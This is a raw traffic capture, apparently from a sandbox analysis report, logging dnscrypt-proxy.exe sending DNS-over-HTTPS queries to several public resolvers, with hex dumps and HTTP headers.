                                                                                                                            2024-03-12 15:33:02 UTC134INData Raw: ca fe 81 83 00 01 00 00 00 01 00 01 10 61 79 6c 6e 61 6c 65 70 69 71 74 74 61 66 77 6a 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 06 00 01 00 00 c8 5a 00 40 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 05 6e 73 74 6c 64 0c 76 65 72 69 73 69 67 6e 2d 67 72 73 03 63 6f 6d 00 78 a4 43 e0 00 00 07 08 00 00 03 84 00 09 3a 80 00 01 51 80 00 00 29 05 c0 00 00 00 00 00 00
                                                                                                                            Data Ascii: aylnalepiqttafwjtestdnscryptZ@aroot-serversnetnstldverisign-grscomxC:Q)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            22192.168.2.54975145.153.187.964437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:33:03 UTC275OUTPOST /dns-query?body_hash=c0935145533e923ab165e924c10e535d9a9b4803509e4a20aac79622ec60d6b0 HTTP/1.1
                                                                                                                            Host: dnsse.alekberg.net
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:33:03 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 9c d9 9f 43 3d 03 31 f1 f6 eb 85 05 62 cf b8 33
                                                                                                                            Data Ascii: )C=1b3
                                                                                                                            2024-03-12 15:33:03 UTC270INHTTP/1.1 200
                                                                                                                            content-length: 260
                                                                                                                            content-type: application/dns-message
                                                                                                                            cache-control: max-age=4637, stale-if-error=86400, stale-while-revalidate=60
                                                                                                                            access-control-allow-origin: *
                                                                                                                            date: Tue, 12 Mar 2024 15:33:03 GMT
                                                                                                                            alt-svc: h3=":443"; ma=60
                                                                                                                            connection: close
                                                                                                                            2024-03-12 15:33:03 UTC260INData Raw: ca fe 81 80 00 01 00 0d 00 00 00 01 00 00 02 00 01 00 00 02 00 01 00 00 12 1d 00 14 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 12 1d 00 04 01 6a c0 1e 00 00 02 00 01 00 00 12 1d 00 04 01 66 c0 1e 00 00 02 00 01 00 00 12 1d 00 04 01 64 c0 1e 00 00 02 00 01 00 00 12 1d 00 04 01 62 c0 1e 00 00 02 00 01 00 00 12 1d 00 04 01 65 c0 1e 00 00 02 00 01 00 00 12 1d 00 04 01 6c c0 1e 00 00 02 00 01 00 00 12 1d 00 04 01 63 c0 1e 00 00 02 00 01 00 00 12 1d 00 04 01 69 c0 1e 00 00 02 00 01 00 00 12 1d 00 04 01 68 c0 1e 00 00 02 00 01 00 00 12 1d 00 04 01 6d c0 1e 00 00 02 00 01 00 00 12 1d 00 04 01 67 c0 1e 00 00 02 00 01 00 00 12 1d 00 04 01 6b c0 1e 00 00 29 04 d0 00 00 00 00 00 15 00 0c 00 11 58 58 58 58 58 58 58 58 58 58 58 58
                                                                                                                            Data Ascii: aroot-serversnetjfdbelcihmgk)XXXXXXXXXXXX


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            23192.168.2.54975245.153.187.964437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:33:04 UTC275OUTPOST /dns-query?body_hash=591966c1ba1a8275465d446c9aedfd7b6417f9042d2a553d148c3b90117453cf HTTP/1.1
                                                                                                                            Host: dnsse.alekberg.net
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 79
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:33:04 UTC79OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 10 6f 73 6a 75 76 79 69 6f 7a 63 68 66 64 68 7a 75 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 83 a2 39 0f 35 28 b5 ac 85 ce 8e 34 48 fe 2e 65
                                                                                                                            Data Ascii: osjuvyiozchfdhzutestdnscrypt)95(4H.e
                                                                                                                            2024-03-12 15:33:04 UTC270INHTTP/1.1 200
                                                                                                                            content-length: 196
                                                                                                                            content-type: application/dns-message
                                                                                                                            cache-control: max-age=7021, stale-if-error=86400, stale-while-revalidate=60
                                                                                                                            access-control-allow-origin: *
                                                                                                                            date: Tue, 12 Mar 2024 15:33:04 GMT
                                                                                                                            alt-svc: h3=":443"; ma=60
                                                                                                                            connection: close
                                                                                                                            2024-03-12 15:33:04 UTC196INData Raw: ca fe 81 83 00 01 00 00 00 01 00 01 10 6f 73 6a 75 76 79 69 6f 7a 63 68 66 64 68 7a 75 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 06 00 01 00 00 1b 6d 00 40 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 05 6e 73 74 6c 64 0c 76 65 72 69 73 69 67 6e 2d 67 72 73 03 63 6f 6d 00 78 a4 43 e0 00 00 07 08 00 00 03 84 00 09 3a 80 00 01 51 80 00 00 29 04 d0 00 00 00 00 00 3e 00 0c 00 3a 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58
                                                                                                                            Data Ascii: osjuvyiozchfdhzutestdnscryptm@aroot-serversnetnstldverisign-grscomxC:Q)>:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            24192.168.2.54975380.67.169.124437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:33:05 UTC267OUTPOST /dns-query?body_hash=68687dfb80f86d266bba956e4ec02a17d13cb8e01c00ba78322cd9eefca2a5bf HTTP/1.1
                                                                                                                            Host: ns0.fdn.fr
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:33:05 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 11 d5 4b 30 18 ca 96 d0 d3 40 ea 91 cd 60 e7 83
                                                                                                                            Data Ascii: )K0@`
                                                                                                                            2024-03-12 15:33:05 UTC186INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 12 Mar 2024 15:33:05 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 239
                                                                                                                            Server: h2o/dnsdist
                                                                                                                            content-type: application/dns-message
                                                                                                                            cache-control: max-age=74605
                                                                                                                            2024-03-12 15:33:05 UTC239INData Raw: ca fe 81 80 00 01 00 0d 00 00 00 01 00 00 02 00 01 00 00 02 00 01 00 01 23 6d 00 14 01 62 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 01 23 6d 00 04 01 63 c0 1e 00 00 02 00 01 00 01 23 6d 00 04 01 64 c0 1e 00 00 02 00 01 00 01 23 6d 00 04 01 65 c0 1e 00 00 02 00 01 00 01 23 6d 00 04 01 66 c0 1e 00 00 02 00 01 00 01 23 6d 00 04 01 67 c0 1e 00 00 02 00 01 00 01 23 6d 00 04 01 68 c0 1e 00 00 02 00 01 00 01 23 6d 00 04 01 69 c0 1e 00 00 02 00 01 00 01 23 6d 00 04 01 6a c0 1e 00 00 02 00 01 00 01 23 6d 00 04 01 6b c0 1e 00 00 02 00 01 00 01 23 6d 00 04 01 6c c0 1e 00 00 02 00 01 00 01 23 6d 00 04 01 6d c0 1e 00 00 02 00 01 00 01 23 6d 00 04 01 61 c0 1e 00 00 29 04 d0 00 00 00 00 00 00
                                                                                                                            Data Ascii: #mbroot-serversnet#mc#md#me#mf#mg#mh#mi#mj#mk#ml#mm#ma)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            25192.168.2.54975480.67.169.124437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:33:06 UTC267OUTPOST /dns-query?body_hash=c4590e78ee3e001a86c74ded2dba36c5a0c2822cfedb83a7c5b9d427c048f983 HTTP/1.1
                                                                                                                            Host: ns0.fdn.fr
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 79
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:33:06 UTC79OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 10 68 65 6d 63 78 68 76 6d 6a 6d 73 79 72 6d 68 6a 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 95 cb 8c 21 ea 2d 76 c3 a8 40 11 af 84 ba 6a d2
                                                                                                                            Data Ascii: hemcxhvmjmsyrmhjtestdnscrypt)!-v@j
                                                                                                                            2024-03-12 15:33:06 UTC184INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 12 Mar 2024 15:33:06 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 134
                                                                                                                            Server: h2o/dnsdist
                                                                                                                            content-type: application/dns-message
                                                                                                                            cache-control: max-age=278
                                                                                                                            2024-03-12 15:33:06 UTC134INData Raw: ca fe 81 83 00 01 00 00 00 01 00 01 10 68 65 6d 63 78 68 76 6d 6a 6d 73 79 72 6d 68 6a 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 06 00 01 00 00 01 16 00 40 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 05 6e 73 74 6c 64 0c 76 65 72 69 73 69 67 6e 2d 67 72 73 03 63 6f 6d 00 78 a4 43 e0 00 00 07 08 00 00 03 84 00 09 3a 80 00 01 51 80 00 00 29 04 d0 00 00 00 00 00 00
                                                                                                                            Data Ascii: hemcxhvmjmsyrmhjtestdnscrypt@aroot-serversnetnstldverisign-grscomxC:Q)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            26192.168.2.549755116.202.176.264437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:33:06 UTC272OUTPOST /dns-query?body_hash=48fb378ae80036efa77f4dced63252c1cefea7819ad204b6868e6c1342a48e78 HTTP/1.1
                                                                                                                            Host: doh.libredns.gr
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:33:06 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 7c 3b 8c 97 ec 57 f0 ec 9c 01 68 10 f9 33 4f 4a
                                                                                                                            Data Ascii: )|;Wh3OJ
                                                                                                                            2024-03-12 15:33:07 UTC336INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                            Date: Tue, 12 Mar 2024 15:33:07 GMT
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Content-Length: 468
                                                                                                                            Connection: close
                                                                                                                            cache-control: max-age=80852
                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            2024-03-12 15:33:07 UTC468INData Raw: ca fe 81 80 00 01 00 07 00 00 00 01 00 00 02 00 01 00 00 02 00 01 00 01 3b d4 00 12 03 6e 73 39 07 6f 70 65 6e 6e 69 63 04 67 6c 75 65 00 00 00 02 00 01 00 01 3b d4 00 06 03 6e 73 36 c0 20 00 00 02 00 01 00 01 3b d4 00 06 03 6e 73 34 c0 20 00 00 02 00 01 00 01 3b d4 00 07 04 6e 73 31 31 c0 20 00 00 02 00 01 00 01 3b d4 00 06 03 6e 73 38 c0 20 00 00 02 00 01 00 01 3b d4 00 06 03 6e 73 32 c0 20 00 00 02 00 01 00 01 3b d4 00 06 03 6e 73 35 c0 20 00 00 29 02 00 00 00 00 00 01 34 00 0c 01 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: ;ns9opennicglue;ns6 ;ns4 ;ns11 ;ns8 ;ns2 ;ns5 )40


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            27192.168.2.549756116.202.176.264437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:33:07 UTC272OUTPOST /dns-query?body_hash=28ddd2a4e9e29708f0542005eae6c30a333fe2d4d7f690e8c3b9c2ff0db161c5 HTTP/1.1
                                                                                                                            Host: doh.libredns.gr
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 79
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:33:07 UTC79OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 10 72 6a 77 64 74 70 71 77 71 6c 6f 71 72 76 78 67 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 a8 b4 84 e6 13 87 46 19 0c 85 97 b3 7d ad 44 5f
                                                                                                                            Data Ascii: rjwdtpqwqloqrvxgtestdnscrypt)F}D_
                                                                                                                            2024-03-12 15:33:08 UTC335INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                            Date: Tue, 12 Mar 2024 15:33:07 GMT
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Content-Length: 468
                                                                                                                            Connection: close
                                                                                                                            cache-control: max-age=1652
                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                            2024-03-12 15:33:08 UTC468INData Raw: ca fe 81 83 00 01 00 00 00 01 00 01 10 72 6a 77 64 74 70 71 77 71 6c 6f 71 72 76 78 67 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 06 00 01 00 00 06 74 00 33 03 6e 73 30 07 6f 70 65 6e 6e 69 63 04 67 6c 75 65 00 0a 68 6f 73 74 6d 61 73 74 65 72 c0 3f 78 a4 43 ed 00 00 07 08 00 00 03 84 00 09 3a 80 00 00 0e 10 00 00 29 02 00 00 00 00 00 01 5b 00 0c 01 57 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: rjwdtpqwqloqrvxgtestdnscryptt3ns0opennicgluehostmaster?xC:)[W


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            28192.168.2.54975791.239.100.1004437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:33:09 UTC282OUTPOST /dns-query?body_hash=cb617857664fdda434a130542cde67fd85707bbcce70918ef618b4e501b3ad2d HTTP/1.1
                                                                                                                            Host: anycast.uncensoreddns.org
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:33:09 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 e5 a2 fd d0 1d 15 9b 75 f3 82 78 04 fc 65 eb 1f
                                                                                                                            Data Ascii: )uxe
                                                                                                                            2024-03-12 15:33:09 UTC260INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 12 Mar 2024 15:33:09 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 823
                                                                                                                            Server: h2o/dnsdist
                                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                            content-type: application/dns-message
                                                                                                                            cache-control: max-age=518400
                                                                                                                            2024-03-12 15:33:09 UTC823INData Raw: ca fe 85 80 00 01 00 0d 00 00 00 1b 00 00 02 00 01 00 00 02 00 01 00 07 e9 00 00 14 01 63 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 c0 11 00 02 00 01 00 07 e9 00 00 04 01 61 c0 1e c0 11 00 02 00 01 00 07 e9 00 00 04 01 6d c0 1e c0 11 00 02 00 01 00 07 e9 00 00 04 01 67 c0 1e c0 11 00 02 00 01 00 07 e9 00 00 04 01 66 c0 1e c0 11 00 02 00 01 00 07 e9 00 00 04 01 64 c0 1e c0 11 00 02 00 01 00 07 e9 00 00 04 01 68 c0 1e c0 11 00 02 00 01 00 07 e9 00 00 04 01 69 c0 1e c0 11 00 02 00 01 00 07 e9 00 00 04 01 6c c0 1e c0 11 00 02 00 01 00 07 e9 00 00 04 01 6b c0 1e c0 11 00 02 00 01 00 07 e9 00 00 04 01 65 c0 1e c0 11 00 02 00 01 00 07 e9 00 00 04 01 62 c0 1e c0 11 00 02 00 01 00 07 e9 00 00 04 01 6a c0 1e c0 4c 00 1c 00 01 00 07 e9 00 00 10 20 01 0d
                                                                                                                            Data Ascii: croot-serversnetamgfdhilkebjL


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            29192.168.2.54975891.239.100.1004437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:33:11 UTC282OUTPOST /dns-query?body_hash=0ce184e612a1cb6b7730c47cbed9ee6ffa71118359498ab380169671e403b437 HTTP/1.1
                                                                                                                            Host: anycast.uncensoreddns.org
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 79
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:33:11 UTC79OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 10 78 7a 74 6b 63 6d 6c 63 79 64 68 78 70 74 6f 61 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 a3 17 53 83 57 0d c1 78 cb a1 c0 41 5f 5b a6 d1
                                                                                                                            Data Ascii: xztkcmlcydhxptoatestdnscrypt)SWxA_[
                                                                                                                            2024-03-12 15:33:11 UTC259INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 12 Mar 2024 15:33:11 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 134
                                                                                                                            Server: h2o/dnsdist
                                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                            content-type: application/dns-message
                                                                                                                            cache-control: max-age=86400
                                                                                                                            2024-03-12 15:33:11 UTC134INData Raw: ca fe 85 83 00 01 00 00 00 01 00 01 10 78 7a 74 6b 63 6d 6c 63 79 64 68 78 70 74 6f 61 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 06 00 01 00 01 51 80 00 40 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 05 6e 73 74 6c 64 0c 76 65 72 69 73 69 67 6e 2d 67 72 73 03 63 6f 6d 00 78 a4 43 e0 00 00 07 08 00 00 03 84 00 09 3a 80 00 01 51 80 00 00 29 04 d0 00 00 00 00 00 00
                                                                                                                            Data Ascii: xztkcmlcydhxptoatestdnscryptQ@aroot-serversnetnstldverisign-grscomxC:Q)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            30192.168.2.549763212.126.59.634437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:33:22 UTC269OUTPOST /dns-query?body_hash=bae945a813f58cc2e67d0522b93d79c2fd680b0ef087b502438286048b4b540f HTTP/1.1
                                                                                                                            Host: open.dns0.eu
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:33:22 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 e9 76 bb 66 a1 47 69 b4 0e 48 f4 c1 e8 58 5c a6
                                                                                                                            Data Ascii: )vfGiHX\
                                                                                                                            2024-03-12 15:33:23 UTC240INHTTP/1.1 200 OK
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                            Date: Tue, 12 Mar 2024 15:33:23 GMT
                                                                                                                            Content-Length: 239
                                                                                                                            Connection: close
                                                                                                                            2024-03-12 15:33:23 UTC239INData Raw: ca fe 81 80 00 01 00 0d 00 00 00 01 00 00 02 00 01 00 00 02 00 01 00 00 67 20 00 14 01 68 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 67 20 00 04 01 69 c0 1e 00 00 02 00 01 00 00 67 20 00 04 01 6a c0 1e 00 00 02 00 01 00 00 67 20 00 04 01 6b c0 1e 00 00 02 00 01 00 00 67 20 00 04 01 6c c0 1e 00 00 02 00 01 00 00 67 20 00 04 01 6d c0 1e 00 00 02 00 01 00 00 67 20 00 04 01 61 c0 1e 00 00 02 00 01 00 00 67 20 00 04 01 62 c0 1e 00 00 02 00 01 00 00 67 20 00 04 01 63 c0 1e 00 00 02 00 01 00 00 67 20 00 04 01 64 c0 1e 00 00 02 00 01 00 00 67 20 00 04 01 65 c0 1e 00 00 02 00 01 00 00 67 20 00 04 01 66 c0 1e 00 00 02 00 01 00 00 67 20 00 04 01 67 c0 1e 00 00 29 04 d0 00 00 00 00 00 00
                                                                                                                            Data Ascii: g hroot-serversnetg ig jg kg lg mg ag bg cg dg eg fg g)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            31192.168.2.549764212.126.59.634437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:33:23 UTC269OUTPOST /dns-query?body_hash=1f30bf3f0c68e293a7e5617cb66b86c359e9ffb70bda638f9b3624cfe8e0831e HTTP/1.1
                                                                                                                            Host: open.dns0.eu
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 79
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:33:23 UTC79OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 10 67 72 6b 68 61 71 65 73 71 6b 70 77 66 62 7a 6a 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 3e 55 46 a3 de bf 7f e1 0c 57 1d 28 7c 4d a7 1f
                                                                                                                            Data Ascii: grkhaqesqkpwfbzjtestdnscrypt)>UFW(|M
                                                                                                                            2024-03-12 15:33:23 UTC240INHTTP/1.1 200 OK
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                            Date: Tue, 12 Mar 2024 15:33:23 GMT
                                                                                                                            Content-Length: 134
                                                                                                                            Connection: close
                                                                                                                            2024-03-12 15:33:23 UTC134INData Raw: ca fe 81 83 00 01 00 00 00 01 00 01 10 67 72 6b 68 61 71 65 73 71 6b 70 77 66 62 7a 6a 04 74 65 73 74 08 64 6e 73 63 72 79 70 74 00 00 02 00 01 00 00 06 00 01 00 00 0e 10 00 40 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 05 6e 73 74 6c 64 0c 76 65 72 69 73 69 67 6e 2d 67 72 73 03 63 6f 6d 00 78 a4 43 e0 00 00 07 08 00 00 03 84 00 09 3a 80 00 01 51 80 00 00 29 04 d0 00 00 00 00 00 00
                                                                                                                            Data Ascii: grkhaqesqkpwfbzjtestdnscrypt@aroot-serversnetnstldverisign-grscomxC:Q)


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            32192.168.2.549767185.194.94.714437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:33:35 UTC269OUTPOST /dns-query?body_hash=9455fe945824dee1707347bd51d310d109ef07683d15f45ae276816fe1dcee1c HTTP/1.1
                                                                                                                            Host: dns.circl.lu
                                                                                                                            User-Agent: dnscrypt-proxy
                                                                                                                            Content-Length: 48
                                                                                                                            Accept: application/dns-message
                                                                                                                            Cache-Control: max-stale
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            2024-03-12 15:33:35 UTC48OUTData Raw: ca fe 01 00 00 01 00 00 00 00 00 01 00 00 02 00 01 00 00 29 10 00 00 00 00 00 00 14 00 0c 00 10 36 4f cc 2d 1d 21 57 c1 fb 44 3d 1d 26 df 27 e8
                                                                                                                            Data Ascii: )6O-!WD=&'
                                                                                                                            2024-03-12 15:33:36 UTC167INHTTP/1.1 200 OK
                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                            Date: Tue, 12 Mar 2024 15:33:36 GMT
                                                                                                                            Content-Type: application/dns-message
                                                                                                                            Content-Length: 1471
                                                                                                                            Connection: close
                                                                                                                            2024-03-12 15:33:36 UTC1471INData Raw: ca fe 81 80 00 01 00 0d 00 00 00 1b 00 00 02 00 01 00 00 02 00 01 00 00 f3 15 00 14 01 67 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 f3 15 00 14 01 69 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 f3 15 00 14 01 62 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 f3 15 00 14 01 6d 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 f3 15 00 14 01 6c 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 f3 15 00 14 01 64 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 f3 15 00 14 01 61 0c 72 6f 6f 74 2d 73 65 72 76 65 72 73 03 6e 65 74 00 00 00 02 00 01 00 00 f3 15 00 14 01 63 0c 72 6f 6f 74 2d 73 65
                                                                                                                            Data Ascii: groot-serversnetiroot-serversnetbroot-serversnetmroot-serversnetlroot-serversnetdroot-serversnetaroot-serversnetcroot-se


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            33192.168.2.549768185.194.94.714437572C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-03-12 15:33:36 UTC269OUTPOST /dns-query?body_hash=fe11740af4db9c5fe45fa40ec16d3fc54fb1c1ec68cc5dc955d2db5a61d7837c HTTP/1.1
                                                                                                                            Host: dns.circl.lu
